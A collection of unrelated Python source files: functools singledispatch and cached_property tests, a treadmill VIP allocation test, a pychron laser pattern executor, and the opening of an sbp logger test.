self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
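# Illustrative sketch for the TestSingleDispatch cases above: implementations
# can be registered by explicit type or by annotating the first parameter,
# and dispatch follows the type of the first positional argument. A minimal
# example, not used by the tests; _singledispatch_demo is illustrative only.
def _singledispatch_demo():
    import functools as _functools
    @_functools.singledispatch
    def describe(obj):
        return "object"
    @describe.register
    def _(obj: int):
        return "int"
    @describe.register(list)
    def _(obj):
        return "list"
    # Returns ('int', 'list', 'object'); str falls back to the base implementation.
    return describe(1), describe([2]), describe("x")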
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
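# Illustrative sketch for the cached_property fixtures in this file: the value
# is computed on first access and stored in the instance __dict__, so later
# reads do not re-run the getter, as the TestCachedProperty cases below check.
# A minimal example, not used by the tests; _CachedPropertyDemo is illustrative
# only and relies on the py_functools module used elsewhere in this file.
class _CachedPropertyDemo:
    def __init__(self):
        self.calls = 0
    @py_functools.cached_property
    def value(self):
        # Runs once; afterwards instance.__dict__['value'] shadows the
        # descriptor, so self.calls stays at 1.
        self.calls += 1
        return self.calls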
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with support.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
vipfile_test.py
|
"""Unit test for vipfile - rule manager.
"""
import os
import shutil
import tempfile
import threading
import unittest
from treadmill import vipfile
class VipFileTest(unittest.TestCase):
"""Tests for teadmill.rulefile."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.vips_dir = os.path.join(self.root, 'vips')
owner_dirs = os.path.join(self.root, 'owners')
os.mkdir(owner_dirs)
for owner in range(0, 15):
with open(os.path.join(owner_dirs, str(owner)), 'w'):
pass
self.vips = vipfile.VipMgr(self.vips_dir, owner_dirs)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_alloc(self):
"""Verifies that vips are allocated atomically with no duplicates."""
vips = set()
def alloc_thread(idx):
"""Allocate container ip."""
ip0 = self.vips.alloc(str(idx))
vips.add(ip0)
threads = []
for i in range(0, 15):
threads.append(threading.Thread(target=alloc_thread, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(len(threads), len(vips))
def test_free(self):
"""Tests freeing the resource."""
owner = '3'
ip0 = self.vips.alloc(owner)
self.assertTrue(os.path.exists(os.path.join(self.vips_dir, ip0)))
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
# Calling free twice is noop.
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
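# Illustrative sketch of the VipMgr calls exercised above; the directory
# layout mirrors setUp() and is an assumption, and _vipmgr_example is not
# invoked by the tests.
def _vipmgr_example(root):
    vips_dir = os.path.join(root, 'vips')
    owner_dirs = os.path.join(root, 'owners')
    os.makedirs(owner_dirs, exist_ok=True)
    with open(os.path.join(owner_dirs, '0'), 'w'):
        pass
    mgr = vipfile.VipMgr(vips_dir, owner_dirs)
    ip0 = mgr.alloc('0')   # reserve an address for owner '0'
    mgr.free('0', ip0)     # freeing the same address again is a no-op (see test_free)
    return ip0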
if __name__ == '__main__':
unittest.main()
|
pattern_executor.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import os
import time
from threading import Event
from io import StringIO
from numpy import polyfit, array, average, uint8, zeros_like
from skimage.color import gray2rgb
from skimage.draw import circle
from traits.api import Any, Bool
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.ui.thread import Thread, sleep
from pychron.envisage.view_util import open_view
from pychron.hardware.motion_controller import PositionError, TargetPositionError
from pychron.lasers.pattern.patternable import Patternable
from pychron.paths import paths
from pychron.pychron_constants import NULL_STR
class PatternExecutor(Patternable):
"""
    A pattern is only good for one execution; self.pattern must be reset
    after stop() or finish() by calling load_pattern(name_or_pickle).
"""
controller = Any
laser_manager = Any
show_patterning = Bool(False)
_alive = Bool(False)
def __init__(self, *args, **kw):
super(PatternExecutor, self).__init__(*args, **kw)
self._next_point = None
self.pattern = None
self._xy_thread = None
self._power_thread = None
self._z_thread = None
def start(self, show=False):
self._alive = True
if show:
self.show_pattern()
if self.pattern:
self.pattern.clear_graph()
def finish(self):
self._alive = False
self.close_pattern()
self.pattern = None
def set_stage_values(self, sm):
if self.pattern:
self.pattern.set_stage_values(sm)
def set_current_position(self, x, y, z):
if self.isPatterning():
graph = self.pattern.graph
graph.set_data([x], series=1, axis=0)
graph.set_data([y], series=1, axis=1)
graph.add_datum((x, y), series=2)
graph.redraw()
def load_pattern(self, name_or_pickle):
"""
            Look for name_or_pickle in the local pattern directory;
            if it is not found there, treat name_or_pickle as a pickled pattern.
"""
if name_or_pickle is None:
path = self.open_file_dialog()
if path is None:
return
else:
path = self.is_local_pattern(name_or_pickle)
if path:
wfile = open(path, 'rb')
else:
# convert name_or_pickle into a file like obj
wfile = StringIO(name_or_pickle)
# self._load_pattern sets self.pattern
pattern = self._load_pattern(wfile, path)
self.on_trait_change(self.stop, 'canceled')
return pattern
def is_local_pattern(self, name):
def test_name(ni):
path = os.path.join(paths.pattern_dir, ni)
if os.path.isfile(path):
return path
for ni in (name, name + '.lp'):
p = test_name(ni)
if p:
return p
def stop(self):
self._alive = False
if self.controller:
self.info('User requested stop')
self.controller.stop()
if self.pattern is not None:
if self.controller:
self.controller.linear_move(self.pattern.cx, self.pattern.cy, source='pattern stop')
# self.pattern.close_ui()
self.info('Pattern {} stopped'.format(self.pattern_name))
# prevent future stops (AbortJogs from massspec) from executing
self.pattern = None
def isPatterning(self):
return self._alive
def close_pattern(self):
pass
def show_pattern(self):
self.pattern.window_x = 50
self.pattern.window_y = 50
open_view(self.pattern, view='graph_view')
def execute(self, block=False, duration=None, thread_safe=True):
"""
            If block is True, wait for patterning to finish
            before returning.
"""
if not self.pattern:
return
self.start(show=self.show_patterning)
evt = None
# if current_thread().name != 'MainThread':
if thread_safe:
evt = Event()
invoke_in_main_thread(self._pre_execute, evt)
while not evt.is_set():
time.sleep(0.05)
else:
self._pre_execute(evt)
self.debug('execute xy pattern')
xyp = self.pattern.xy_pattern_enabled
if duration:
self.pattern.external_duration = float(duration)
if xyp:
self._xy_thread = Thread(target=self._execute_xy_pattern)
self._xy_thread.start()
pp = self.pattern.power_pattern
if pp:
self.debug('execute power pattern')
self._power_thread = Thread(target=self._execute_power_pattern)
self._power_thread.start()
zp = self.pattern.z_pattern
if zp:
self.debug('execute z pattern')
self._z_thread = Thread(target=self._execute_z_pattern)
self._z_thread.start()
if block:
if self._xy_thread:
self._xy_thread.join()
if self._z_thread:
self._z_thread.join()
if self._power_thread:
self._power_thread.join()
self.finish()
def _pre_execute(self, evt):
self.debug('pre execute')
pattern = self.pattern
kind = pattern.kind
if kind in ('SeekPattern', 'DragonFlyPeakPattern'):
self._info = open_view(pattern, view='execution_graph_view')
if evt is not None:
evt.set()
self.debug('pre execute finished')
def _execute_power_pattern(self):
pat = self.pattern
self.info('starting power pattern {}'.format(pat.name))
def func(v):
self.laser_manager.set_laser_power(v)
self._execute_(func, pat.power_values(), pat.power_sample, 'power pattern setpoint={value}')
def _execute_z_pattern(self):
pat = self.pattern
        self.info('starting z pattern {}'.format(pat.name))
def func(v):
self.controller.set_z(v)
self._execute_(func, pat.z_values(), pat.z_sample, 'z pattern z={value}')
def _execute_(self, func, vs, period, msg):
for v in vs:
st = time.time()
self.debug(msg.format(value=v))
func(v)
            et = time.time() - st
            # sleep only for whatever remains of the period; never a negative time
            p = max(0, period - et)
            time.sleep(p)
def _execute_xy_pattern(self):
pat = self.pattern
self.info('starting pattern {}'.format(pat.name))
st = time.time()
self.controller.update_position()
time.sleep(1)
pat.cx, pat.cy = self.controller.x, self.controller.y
try:
for ni in range(pat.niterations):
if not self.isPatterning():
break
self.info('doing pattern iteration {}'.format(ni))
self._execute_iteration()
self.controller.linear_move(pat.cx, pat.cy, block=True, source='execute_xy_pattern')
if pat.disable_at_end:
self.laser_manager.disable_device()
self.finish()
self.info('finished pattern: transit time={:0.1f}s'.format(time.time() - st))
except (TargetPositionError, PositionError) as e:
self.finish()
self.controller.stop()
self.laser_manager.emergency_shutoff(str(e))
def _execute_iteration(self):
controller = self.controller
pattern = self.pattern
if controller is not None:
kind = pattern.kind
if kind == 'ArcPattern':
self._execute_arc(controller, pattern)
elif kind == 'CircularContourPattern':
self._execute_contour(controller, pattern)
elif kind in ('SeekPattern', 'DragonFlyPeakPattern'):
self._execute_seek(controller, pattern)
else:
self._execute_points(controller, pattern, multipoint=False)
def _execute_points(self, controller, pattern, multipoint=False):
pts = pattern.points_factory()
if multipoint:
controller.multiple_point_move(pts, velocity=pattern.velocity)
else:
for x, y in pts:
if not self.isPatterning():
break
controller.linear_move(x, y, block=True,
velocity=pattern.velocity)
def _execute_contour(self, controller, pattern):
for ni in range(pattern.nsteps):
if not self.isPatterning():
break
r = pattern.radius * (1 + ni * pattern.percent_change)
self.info('doing circular contour {} {}'.format(ni + 1, r))
controller.single_axis_move('x', pattern.cx + r,
block=True)
controller.arc_move(pattern.cx, pattern.cy, 360,
block=True)
time.sleep(0.1)
def _execute_arc(self, controller, pattern):
controller.single_axis_move('x', pattern.radius, block=True)
controller.arc_move(pattern.cx, pattern.cy, pattern.degrees, block=True)
def _execute_seek(self, controller, pattern):
duration = pattern.duration
total_duration = pattern.total_duration
lm = self.laser_manager
sm = lm.stage_manager
ld = sm.lumen_detector
ld.mask_kind = pattern.mask_kind
ld.custom_mask = pattern.custom_mask_radius
osdp = sm.canvas.show_desired_position
sm.canvas.show_desired_position = False
st = time.time()
self.debug('Pre seek delay {}'.format(pattern.pre_seek_delay))
time.sleep(pattern.pre_seek_delay)
self.debug('starting seek')
self.debug('total duration {}'.format(total_duration))
self.debug('dwell duration {}'.format(duration))
if pattern.kind == 'DragonFlyPeakPattern':
try:
self._dragonfly_peak(st, pattern, lm, controller)
except BaseException as e:
self.critical('Dragonfly exception. {}'.format(e))
else:
self._hill_climber(st, controller, pattern)
sm.canvas.show_desired_position = osdp
from pyface.gui import GUI
GUI.invoke_later(self._info.dispose)
def _dragonfly_peak(self, st, pattern, lm, controller):
# imgplot, imgplot2, imgplot3 = pattern.setup_execution_graph()
# imgplot, imgplot2 = pattern.setup_execution_graph()
imgplot, imgplot2 = pattern.setup_execution_graph(nplots=2)
cx, cy = pattern.cx, pattern.cy
sm = lm.stage_manager
linear_move = controller.linear_move
in_motion = controller.in_motion
find_lum_peak = sm.find_lum_peak
pxpermm = sm.pxpermm
set_data = imgplot.data.set_data
set_data2 = imgplot2.data.set_data
# set_data3 = imgplot3.data.set_data
duration = pattern.duration
sat_threshold = pattern.saturation_threshold
total_duration = pattern.total_duration
min_distance = pattern.min_distance
aggressiveness = pattern.aggressiveness
update_period = pattern.update_period / 1000.
move_threshold = pattern.move_threshold
blur = pattern.blur
px, py = cx, cy
ncx, ncy = cx, cy
point_gen = None
cnt = 0
# peak = None
oimg = sm.get_preprocessed_src()
pos_img = zeros_like(oimg, dtype='int16')
per_img = zeros_like(oimg, dtype='int16')
img_h, img_w = pos_img.shape
perimeter_circle = circle(img_h / 2, img_w / 2, pattern.perimeter_radius * pxpermm)
color = 2**15-1
per_img[perimeter_circle] = 50
set_data('imagedata', gray2rgb(per_img.astype(uint8)))
while time.time() - st < total_duration:
if not self._alive:
break
sats = []
pts = []
ist = time.time()
npt = None
self.debug('starting iteration={}, in_motion={}'.format(cnt, in_motion()))
while time.time() - ist < duration or in_motion():
args = find_lum_peak(min_distance, blur)
if args is None:
sleep(update_period/5)
continue
sleep(update_period)
pt, peakcol, peakrow, peak_img, sat, src = args
sats.append(sat)
# if peak is None:
# peak = peak_img
# else:
# peak = ((peak.astype('int16') - 2) + peak_img).clip(0, 255)
# img = gray2rgb(peak).astype(uint8)
src = gray2rgb(src).astype(uint8)
if pt:
pts.append(pt)
c = circle(peakrow, peakcol, 2)
# img[c] = (255, 0, 0)
src[c] = (255, 0, 0)
# set_data('imagedata', src)
set_data2('imagedata', src)
# set_data('imagedata', img)
self.debug('iteration {} finished, npts={}'.format(cnt, len(pts)))
pattern.position_str = NULL_STR
if pts:
w = array(sats)
avg_sat_score = w.mean()
self.debug('Average Saturation: {} threshold={}'.format(avg_sat_score, sat_threshold))
pattern.average_saturation = avg_sat_score
if avg_sat_score < sat_threshold:
# pts = array(pts)
x, y, w = array(pts).T
ws = w.sum()
nx = (x * w).sum() / ws
ny = (y * w).sum() / ws
self.debug('New point {},{}'.format(nx, ny))
npt = nx, ny, 1
else:
continue
if npt is None:
if not point_gen:
point_gen = pattern.point_generator()
# wait = False
x, y = next(point_gen)
px, py = ncx + x, ncy + y
self.debug('generating new point={},{} ---- {},{}'.format(x, y, px, py))
else:
point_gen = None
# wait = True
if npt is None:
block = total_duration - (time.time() - st) < duration
linear_move(cx, cy, source='recenter_dragonfly{}'.format(cnt), block=block,
velocity=pattern.velocity,
use_calibration=False)
pattern.position_str = 'Return to Center'
px, py = cx, cy
continue
try:
scalar = npt[2]
except IndexError:
scalar = 1
ascalar = scalar * aggressiveness
dx = npt[0] / pxpermm * ascalar
dy = npt[1] / pxpermm * ascalar
if abs(dx) < move_threshold or abs(dy) < move_threshold:
                self.debug('Deviation too small dx={}, dy={}, threshold={}'.format(dx, dy, move_threshold))
pattern.position_str = 'Deviation too small'
continue
px += dx
py -= dy
self.debug('i: {}. point={},{}. '
                           'Intensity Scalar={}, Modified Scalar={}'.format(cnt, px, py, scalar, ascalar))
ncx, ncy = px, py
if not pattern.validate(px, py):
self.debug('invalid position. {},{}'.format(px, py))
curx = px - dx
cury = py + dy
vx = curx - cx
vy = cury - cy
px = vx * aggressiveness + cx
py = vy * aggressiveness + cy
self.debug('reduced vector magnitude. new pos={},{}'.format(px, py))
# for safety validate this new position
# if above calculation is correct the new position should always be valid
if not pattern.validate(px, py):
self.debug('vector calculations incorrect. moving to center position')
px, py = cx, cy
ncx, ncy = px, py
pattern.position_str = '{:0.5f},{:0.5f}'.format(px, py)
# if there is less than 1 duration left then block is true
block = total_duration - (time.time() - st) < duration
self.debug('blocking ={}'.format(block))
linear_move(px, py, source='dragonfly{}'.format(cnt), block=block, velocity=pattern.velocity,
use_calibration=False)
ay, ax = py - cy, px - cx
# self.debug('position mm ax={},ay={}'.format(ax, ay))
ay, ax = int(-ay * pxpermm) + img_h / 2, int(ax * pxpermm) + img_w / 2
# self.debug('position pixel ax={},ay={}'.format(ax, ay))
pos_img -= 5
pos_img = pos_img.clip(0, color)
c = circle(ay, ax, 2)
pos_img[c] = color - 60
nimg = ((pos_img + per_img).astype(uint8))
set_data('imagedata', gray2rgb(nimg))
cnt += 1
self.debug('dragonfly complete')
controller.block()
def _hill_climber(self, st, controller, pattern):
g = pattern.execution_graph
imgplot, cp = pattern.setup_execution_graph()
cx, cy = pattern.cx, pattern.cy
sm = self.laser_manager.stage_manager
linear_move = controller.linear_move
get_scores = sm.get_scores
moving = sm.moving
update_axes = sm.update_axes
set_data = imgplot.data.set_data
sat_threshold = pattern.saturation_threshold
total_duration = pattern.total_duration
duration = pattern.duration
pattern.perimeter_radius *= sm.pxpermm
avg_sat_score = -1
# current_x, current_y =None, None
for i, pt in enumerate(pattern.point_generator()):
update_plot = True
x, y = pt.x, pt.y
ax, ay = cx + x, cy + y
if not self._alive:
break
if time.time() - st > total_duration:
break
# use_update_point = False
if avg_sat_score < sat_threshold:
# use_update_point = False
# current_x, current_y = x, y
linear_move(ax, ay, block=False, velocity=pattern.velocity,
use_calibration=False,
update=False,
immediate=True)
else:
self.debug('Saturation target reached. not moving')
update_plot = False
density_scores = []
ts = []
saturation_scores = []
positions = []
def measure_scores(update=False):
if update:
update_axes()
positions.append((controller.x, controller.y))
score_density, score_saturation, img = get_scores()
density_scores.append(score_density)
saturation_scores.append(score_saturation)
set_data('imagedata', img)
ts.append(time.time() - st)
time.sleep(0.1)
while moving(force_query=True):
measure_scores(update=True)
mt = time.time()
while time.time() - mt < duration:
measure_scores()
if density_scores:
n = len(density_scores)
density_scores = array(density_scores)
saturation_scores = array(saturation_scores)
weights = [1 / (max(0.0001, ((xi - ax) ** 2 + (yi - ay) ** 2)) ** 0.5) for xi, yi in positions]
avg_score = average(density_scores, weights=weights)
avg_sat_score = average(saturation_scores, weights=weights)
score = avg_score
m, b = polyfit(ts, density_scores, 1)
if m > 0:
score *= (1 + m)
pattern.set_point(score, pt)
self.debug('i:{} XY:({:0.5f},{:0.5f})'.format(i, x, y))
self.debug('Density. AVG:{:0.3f} N:{} Slope:{:0.3f}'.format(avg_score, n, m))
self.debug('Modified Density Score: {:0.3f}'.format(score))
self.debug('Saturation. AVG:{:0.3f}'.format(avg_sat_score))
if update_plot:
cp.add_point((x, y))
g.add_datum((x, y), plotid=0)
t = time.time() - st
g.add_datum((t, avg_score), plotid=1)
# g.add_bulk_data(ts, density_scores, plotid=1, series=1)
g.add_datum((t, score),
ypadding='0.1',
ymin_anchor=-0.1,
update_y_limits=True, plotid=1)
update_axes()
# ============= EOF =============================================
|
test_logger.py
|
#!/usr/bin/env python
# Copyright (C) 2015 Swift Navigation Inc.
# Contact: https://support.swiftnav.com
#
# This source is subject to the license found in the file 'LICENSE' which must
# be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
import pytest
pytest.importorskip("numpy")
from sbp.msg import SBP
from sbp.client.loggers.base_logger import LogIterator
from sbp.client.loggers.json_logger import JSONLogIterator
from sbp.client.loggers.rotating_logger import RotatingFileLogger
from sbp.client.loggers.udp_logger import UdpLogger
from sbp.acquisition import MsgAcqResultDepA
from sbp.logging import MsgPrintDep
from sbp.table import _SBP_TABLE, dispatch
from sbp.table import InvalidSBPMessageType
import six
from six.moves import socketserver
import threading
import os, tempfile, time
import warnings
def test_log():
"""
Abstract interface won't work
"""
log_datafile = "./data/serial_link_log_20150310-115522-test.log.dat"
with open(log_datafile, 'r') as infile:
with LogIterator(infile) as log:
with pytest.raises(NotImplementedError) as exc_info:
for msg, metadata in next(log):
pass
assert exc_info.value.args[0] == "next() not implemented!"
def _json_log(conventional, fetch_next):
